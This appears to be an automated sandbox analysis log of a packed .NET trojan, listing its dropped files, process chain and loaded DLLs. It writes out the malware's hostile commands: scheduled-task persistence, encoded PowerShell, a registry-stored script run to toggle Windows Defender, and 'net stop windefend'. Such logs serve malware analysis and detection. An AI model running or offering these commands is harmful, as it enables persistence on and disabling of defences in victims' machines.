Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Loader.exe, 00000014.00000002.2527964251.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, tmp5DD6.tmp.dat.21.dr, tmpABDC.tmp.dat.20.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Virustotal: Detection: 82%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\Loaader.exe C:\Users\user\AppData\Roaming\Loaader.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Loader.exe C:\Users\user\AppData\Roaming\Loader.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Section loaded: onecoreuapcommonproxystub.dll
